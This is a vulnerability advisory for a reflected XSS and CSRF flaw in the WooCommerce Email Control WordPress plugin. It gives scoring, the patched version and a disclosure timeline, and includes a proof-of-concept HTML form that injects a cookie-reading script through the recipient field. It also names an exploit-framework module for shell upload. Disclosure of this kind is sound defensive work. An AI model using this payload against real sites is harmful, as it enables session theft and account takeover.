Homepage
https://wordpress.org/plugins/woo-email-control/
Overview
Due to a lack of encoding and CSRF mitigation in the test_email
function found on line 106 of classes/class-wooctrl.php
, it is possible to automate a request to the AJAX handler for the wooctrl_send_test_email
action which will reflect the specified script back to the end user.
CVSS Score
4.8
CVSS Vector
(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)
Versions Affected
1.01 and below
Solution
Upgrade to version 1.02
Proof of Concept
<form method="post" action="http://<target>/wp-admin/admin-ajax.php?action=wooctrl_send_test_email">
<input type="text" name="email_class" value="WC_Email_Customer_New_Account">
<input type="text" name="recipient" value="user@user.com<img src=x onerror=alert(document.cookie)>">
<input type="submit" value="Test">
</form>
WordPress Exploit Framework Module
exploit/xss/reflected/woo_email_control_reflected_xss_shell_upload
WPVDB-ID
8559
Disclosure Timeline
- 2016-07-18: Identified vulnerability, contacted vendor with POC and a patch.
- 2016-07-18: Vendor released patch.